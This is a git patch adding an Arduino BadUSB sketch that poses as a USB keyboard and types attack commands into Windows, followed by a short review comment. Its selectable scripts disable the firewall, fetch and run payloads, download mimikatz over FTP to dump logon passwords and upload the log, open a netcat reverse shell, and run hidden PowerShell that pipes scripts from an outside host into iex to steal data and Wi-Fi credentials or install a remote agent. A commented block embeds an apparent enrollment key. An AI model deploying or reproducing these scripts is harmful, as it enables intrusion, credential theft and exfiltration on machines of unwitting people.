From ea238895f0414f5acae18150686437bbb2b7d8e3 Mon Sep 17 00:00:00 2001
From: Didier Asechimann
Date: Tue, 21 Oct 2025 18:26:33 -0400
Subject: [PATCH] Upload New File win version
---
ino/BadUSB_WIN.ino | 817 +++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 817 insertions(+)
create mode 100644 ino/BadUSB_WIN.ino
diff --git a/ino/BadUSB_WIN.ino b/ino/BadUSB_WIN.ino
new file mode 100644
index 0000000..b591632
--- /dev/null
+++ b/ino/BadUSB_WIN.ino
@@ -0,0 +1,817 @@ +// +----------------------------------------------------------------+ +// | Multi Script USB key | +// | Last Update 2025-10-20 | +// | By Didier Aeschimann | +// | Version 1.0 | +// +----------------------------------------------------------------+ + +#include "Keyboard.h" + +bool Ro[8]; +bool OldRo=0; +bool CanRun = true; + +/******************************************************************** + * Opens the run bar and executes the command. + ********************************************************************/ +void CommandAtRunBarMSWIN(char *SomeCommand){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('r'); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Run the program with admin privileges. -Joel Serna Moreno + ********************************************************************/ +void RunProgramAdminMSWIN(char *SomeCommand){ + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.print(SomeCommand); + delay(3000); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_SHIFT); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(4000); + Keyboard.press(KEY_LEFT_ARROW); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Minimize open windows. -Joel Serna Moreno + ********************************************************************/ +void MinimizeWindowMSWIN(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('d'); + delay(100); + Keyboard.release('d'); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Open the search box. 
-Joel Serna Moreno + ********************************************************************/ +void CommandOpenSearchMSWIN(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('s'); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Block active sessions. -Joel Serna Moreno + ********************************************************************/ +void BlockSessionMSWIN(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('l'); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Close active program. -Joel Serna Moreno + ********************************************************************/ +void CloseProgramsMSWIN(){ + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_F4); + delay(100); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens the run bar and executes the command. + ********************************************************************/ +void CommandAtRunBarGnome(char *SomeCommand){ + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_F2); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens spotlight and executes the command. -Adam Baldwin + ********************************************************************/ +void CommandAtRunBarOSX(char *SomeCommand){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press(' '); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens New Terminal and executes command. 
-Adam Baldwin + ********************************************************************/ +void CommandAtNewTerminal(char *SomeCommand){ + CommandAtRunBarOSX("Terminal"); + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('n'); + delay(100); + Keyboard.releaseAll(); + delay(1500); + Keyboard.print(SomeCommand); + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +/******************************************************************** + * Opens the run bar and executes the command. -Aaron Howell + ********************************************************************/ +void ShrinkCurWinOSX(){ + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('h'); + delay(100); + Keyboard.releaseAll(); + delay(250); +} + +/******************************************************************** + * Shrinks the active window to help hide it. + ********************************************************************/ +void ShrinkCurWin(){ + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(' '); + delay(100); + Keyboard.releaseAll(); + delay(250); + Keyboard.print("n"); +} + +void ShrinkCurWinMSWIN(){ + ShrinkCurWin(); +} + +void ShrinkCurWinGnome(){ + ShrinkCurWin(); +} + +void PressAndRelease(int KeyCode,int KeyCount){ + int KeyCounter=0; + for (KeyCounter=0; KeyCounter!=KeyCount; KeyCounter++){ + Keyboard.print(KeyCode); + } +} + +/********************************************************************* + * ledkeys returns the setting of the "lock keys" + * Num Lock = 1 + * CAPS Lock = 2 + * Scroll Lock = 4 + * Add them together to get combos, for example if all three are on, 7 would be the result + *********************************************************************/ +/* +int ledkeys(void) +{ + return int(keyboard_leds); +} +*/ + +/********************************************************************* + * Returns TRUE if NUM Lock LED is on and FALSE otherwise. 
+ *********************************************************************/ +/* +boolean IsNumbOn(void) +{ + if ((ledkeys() & 1) == 1){ + return true; + } + else { + return false; + } +} +*/ + +/********************************************************************* + * Returns TRUE if Caps Lock LED is on and FALSE otherwise. + **********************************************************************/ +/* +boolean IsCapsOn(void) +{ + if ((ledkeys() & 2) == 2){ + return true; + } + else { + return false; + } +} +*/ + +/********************************************************************* + * Returns TRUE if Scroll Lock LED is on and FALSE otherwise. + **********************************************************************/ +/* +boolean IsScrlOn(void) +{ + if ((ledkeys() & 4) == 4){ + return true; + } + else { + return false; + } +} +*/ +//******************************************************************** + +void RunScript_Win_DisableFirewall() { + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.print("cmd"); + delay(2000); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_SHIFT); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.press(KEY_LEFT_ARROW); + delay(100); + Keyboard.releaseAll(); + delay(4000); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.println("netsh advfirewall set currentprofile state off"); + delay(3000); + Keyboard.println("exit"); + CanRun=1; +} + +void RunScript_Win_DLandRunFile(){ + CommandAtRunBarMSWIN("powershell"); + delay(3000); + Keyboard.println("powershell Import-Module BitsTransfer;"); + delay(3000); + Keyboard.println("Start-BitsTransfer -Source \"http://server/file.exe\" -Destination \"%TEMP%\\file.exe\";"); + delay(3000); + Keyboard.println("Start-Process \"%TEMP%\\fichero.exe\""); + CanRun=1; +} + +void RunScript_Win_export_basic_information_wmic() { + Keyboard.press(KEY_LEFT_GUI); + 
delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.println("cmd"); + delay(3000); + Keyboard.println("wmic bios get serialnumber>>information.txt"); + delay(3000); + Keyboard.println("wmic computersystem get model>>information.txt"); + delay(7000); + Keyboard.println("wmic product get name>>information.txt"); + delay(3000); + Keyboard.println("notepad information.txt"); + CanRun=1; +} + +void RunScript_Win_FakeUpdateScreen() { + CommandAtRunBarMSWIN("iexplore -k https://fakeupdate.net/sarcastic/"); + delay(3000); + Keyboard.press(KEY_F11); + delay(100); + Keyboard.releaseAll(); + CanRun=1; +} + +void RunScript_Win_mimikatz_passwords_windows_ftp() { + Keyboard.press(KEY_LEFT_GUI); + delay(100); + Keyboard.releaseAll(); + delay(2000); + Keyboard.print("cmd"); + delay(2000); + Keyboard.press(KEY_LEFT_CTRL); + Keyboard.press(KEY_LEFT_SHIFT); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.press(KEY_LEFT_ARROW); + delay(100); + Keyboard.releaseAll(); + delay(4000); + Keyboard.press(KEY_RETURN); + delay(100); + Keyboard.releaseAll(); + delay(3000); + Keyboard.println("ftp"); + delay(3000); + Keyboard.println("open IPSERVERFTP"); + delay(10000); + Keyboard.println("USERNAME"); + delay(3000); + Keyboard.println("PASSWORD"); + delay(5000); + Keyboard.println("binary"); + delay(2000); + Keyboard.println("GET mimikatz.exe"); + delay(5000); + Keyboard.println("bye"); + delay(3000); + Keyboard.println("mimikatz.exe"); + delay(4000); + Keyboard.println("log"); + delay(2000); + Keyboard.println("privilege::debug"); + delay(3000); + Keyboard.println("sekurlsa::logonPasswords full"); + delay(10000); + Keyboard.println("exit"); + delay(3000); + Keyboard.println("ftp"); + delay(3000); + Keyboard.println("open IPSERVERFTP"); + delay(10000); + Keyboard.println("USERNAME"); + delay(3000); + Keyboard.println("PASSWORD"); + delay(5000); + Keyboard.println("PUT mimikatz.log"); + delay(3000); + Keyboard.println("bye"); + 
delay(3000); + Keyboard.println("del mimikatz.exe & del mimikatz.log"); + delay(3000); + Keyboard.println("exit"); + CanRun=1; +} + +void RunScript_Win_lock_your_computer_message_prank() { + CommandAtRunBarMSWIN("notepad.exe"); + delay(5000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("I will learn to lock my computer."); + delay(2000); + Keyboard.println("Please remember to lock your computer when you step away from your desk."); + delay(2000); + Keyboard.println("Thank you."); + delay(2000); + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(' '); + Keyboard.print("x"); + delay(100); + Keyboard.releaseAll(); + CanRun=1; +} + +void RunScript_Win_netcat_ftp_and_reverse_shell() { + CommandAtRunBarMSWIN("cmd"); + delay(5000); + Keyboard.println("ftp"); + delay(2000); + Keyboard.println("open IPSERVERFTP"); + delay(5000); + Keyboard.println("USERNAME"); + delay(2000); + Keyboard.println("PASSWORD"); + delay(5000); + Keyboard.println("binary"); + delay(2000); + Keyboard.println("GET nc64.exe"); + delay(4000); + Keyboard.println("bye"); + delay(2000); + Keyboard.println("nc64.exe IP PORT -e cmd.exe -d"); +//https://github.com/int0x33/nc.exe/ + delay(5000); + Keyboard.press(KEY_LEFT_ALT); + Keyboard.press(KEY_F4); + delay(100); + Keyboard.releaseAll(); + CanRun=1; +} + +void RunScript_Win_Exfiltrate_Data() { + CommandAtRunBarMSWIN("powershell -w h -NoP -Ep Bypass ;irm www.home.daprogs.net/dl/exfil.ps1 | iex"); + CanRun=1; +} + +void RunScript_Win_Exfiltrate_Wifi() { + CommandAtRunBarMSWIN("powershell -w h -NoP -Ep Bypass ;irm www.home.daprogs.net/dl/wifi.ps1 | iex"); + CanRun=1; +} + +void RunScript_Win_Install_Mesh() { + 
CommandAtRunBarMSWIN("powershell -w h -NoP -Ep Bypass ;irm www.home.daprogs.net/dl/mesh.ps1 | iex"); + CanRun=1; +} + +// void RunScript_Nix_Install_Mesh() { +// Keyboard.print("(wget 'https://support.daprogs.net/meshagents?script=1' -O ./meshinstall.sh || wget 'https://support.daprogs.net/meshagents?script=1' --no-proxy -O ./meshinstall.sh) && chmod 755 ./meshinstall.sh && sudo -E ./meshinstall.sh https://support.daprogs.net 'INYpk$Xf2hkMKRCkGfy08RotsKO@62RZVe2KDw4WUq@QhwTCMs6uRfHzFruSR4GY' || ./meshinstall.sh https://support.daprogs.net 'INYpk$Xf2hkMKRCkGfy08RotsKO@62RZVe2KDw4WUq@QhwTCMs6uRfHzFruSR4GY'"); +// Keyboard.press(KEY_RETURN); +// Keyboard.releaseAll(); +// CanRun=1; +// } + +void SelectScript() { + Ro[0]=!digitalRead(2); // off=EN, on=FR + Ro[1]=!digitalRead(3); // Restart Switch + Ro[2]=!digitalRead(4); // bit 32 + Ro[3]=!digitalRead(5); // bit 16 + Ro[4]=!digitalRead(6); // bit 8 + Ro[5]=!digitalRead(7); // bit 4 + Ro[6]=!digitalRead(8); // bit 2 + Ro[7]=!digitalRead(9); // bit 1 + + OldRo = Ro[1]; // Reset switch 2 state + + byte value = 0; + for (int i = 7; i > 1; i--) { + if (Ro[i]) + value |= (1 << (7-i)); + } + + Serial.print(Ro[0]); + Serial.print(" "); + Serial.print(Ro[1]); + Serial.print(" "); + Serial.print(Ro[2]); + Serial.print(" "); + Serial.print(Ro[3]); + Serial.print(" "); + Serial.print(Ro[4]); + Serial.print(" "); + Serial.print(Ro[5]); + Serial.print(" "); + Serial.print(Ro[6]); + Serial.print(" "); + Serial.print(Ro[7]); + Serial.print(" "); + + if (Ro[0]) { // Select keyboard language with first switch + Keyboard.begin(KeyboardLayout_fr_FR); + Serial.print("FR"); + } + else{ + Keyboard.begin(KeyboardLayout_en_US); + Serial.print("EN"); + } + + Serial.print(" "); + Serial.print(value); + Serial.println(); + + delay(3000); + + switch (value) { + case 0: // All 6 switches (2-8) are in the off position + Serial.println("No Script Selected"); + CanRun=1; //Make sure switch 2 can retart a loop + break; + case 1: + 
Serial.println("Win_Install_Mesh"); + RunScript_Win_Install_Mesh(); + break; + case 2: + Serial.println("Win_Exfiltrate_Wifi"); + RunScript_Win_Exfiltrate_Wifi(); + break; + case 3: + Serial.println("Win_Exfiltrate_Data"); + RunScript_Win_Exfiltrate_Data(); + break; + case 4: + Serial.println("Win_netcat_ftp_and_reverse_shell"); + RunScript_Win_netcat_ftp_and_reverse_shell(); + break; + case 5: + Serial.println("Win_lock_your_computer_message_prank"); + RunScript_Win_lock_your_computer_message_prank(); + break; + case 6: + Serial.println("Win_mimikatz_passwords_windows_ftp"); + RunScript_Win_mimikatz_passwords_windows_ftp(); + break; + case 7: + Serial.println("Win_FakeUpdateScreen"); + RunScript_Win_FakeUpdateScreen(); + break; + case 8: + Serial.println("Win_export_basic_information_wmic"); + RunScript_Win_export_basic_information_wmic(); + break; + case 9: + Serial.println("Win_DLandRunFile"); + RunScript_Win_DLandRunFile(); + break; + case 10: + Serial.println("Win_DisableFirewall"); + RunScript_Win_DisableFirewall(); + break; + case 11: + Serial.println("11"); + CanRun=1; //Make sure switch 2 can retart a loop + break; + case 12: + Serial.println("12"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 13: + Serial.println("13"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 14: + Serial.println("14"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 15: + Serial.println("15"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 16: + Serial.println("16"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 17: + Serial.println("17"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 18: + Serial.println("18"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 19: + Serial.println("19"); + CanRun=1; //Make sure switch 2 can retart a 
loop + // statements + break; + case 20: + Serial.println("20"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 21: + Serial.println("21"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 22: + Serial.println("22"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 23: + Serial.println("23"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 24: + Serial.println("24"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 25: + Serial.println("25"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 26: + Serial.println("26"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 27: + Serial.println("27"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 28: + Serial.println("28"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 29: + Serial.println("29"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 30: + Serial.println("30"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 31: + Serial.println("31"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 32: + Serial.println("32"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 33: + Serial.println("33"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 34: + Serial.println("34"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 35: + Serial.println("35"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 36: + Serial.println("36"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 37: + Serial.println("37"); + CanRun=1; //Make sure switch 2 can retart a 
loop + // statements + break; + case 38: + Serial.println("38"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 39: + Serial.println("39"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 40: + Serial.println("40"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 41: + Serial.println("41"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 42: + Serial.println("42"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 43: + Serial.println("43"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 44: + Serial.println("44"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 45: + Serial.println("45"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 46: + Serial.println("46"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 47: + Serial.println("47"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 48: + Serial.println("48"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 49: + Serial.println("49"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 50: + Serial.println("50"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 51: + Serial.println("51"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 52: + Serial.println("52"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 53: + Serial.println("53"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 54: + Serial.println("54"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 55: + Serial.println("55"); + CanRun=1; //Make sure switch 2 can retart a 
loop + // statements + break; + case 56: + Serial.println("56"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 57: + Serial.println("57"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 58: + Serial.println("58"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 59: + Serial.println("59"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 60: + Serial.println("60"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + case 61: + Serial.println("61"); + CanRun=1; //Make sure switch 2 can retart a loop + // statements + break; + default: + // statements + break; + } +} + +void setup() { + Serial.begin(115200); + pinMode(2, INPUT_PULLUP); + pinMode(3, INPUT_PULLUP); + pinMode(4, INPUT_PULLUP); + pinMode(5, INPUT_PULLUP); + pinMode(6, INPUT_PULLUP); + pinMode(7, INPUT_PULLUP); + pinMode(8, INPUT_PULLUP); + pinMode(9, INPUT_PULLUP); + //Setup for first Run + delay(100); + OldRo = digitalRead(3); + CanRun = 1; +} + +void loop() { + delay(1000); + if (CanRun){ + if (OldRo != !digitalRead(3)){ + CanRun=0; + SelectScript(); + } + } +}
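Review bot: The commented-out `RunScript_Nix_Install_Mesh` block just above `SelectScript()` embeds, twice in one `Keyboard.print` string, what looks like an agent enrollment key for `support.daprogs.net`. Commenting code out does not keep it out of the repository or its history, so the value should be treated as exposed and rotated on the server, and the block removed or the literal replaced with a placeholder such as `'<ENROLLMENT_KEY>'`. Separately, `RunScript_Win_Exfiltrate_Data`, `RunScript_Win_Exfiltrate_Wifi` and `RunScript_Win_Install_Mesh` each type a command that pipes a script fetched from `www.home.daprogs.net` straight into `iex`, so what runs on the host is decided by that server at run time and cannot be reviewed from this commit; a comment above each function recording what the fetched script is expected to do, and which revision was reviewed, would make the sketch auditable. For defenders reading this page, the observable pattern is a newly enumerated USB keyboard followed within seconds by Run-dialog launches of `cmd` or `powershell` with `-w h -NoP -Ep Bypass`, which process-creation logging and USB device-control policy can catch.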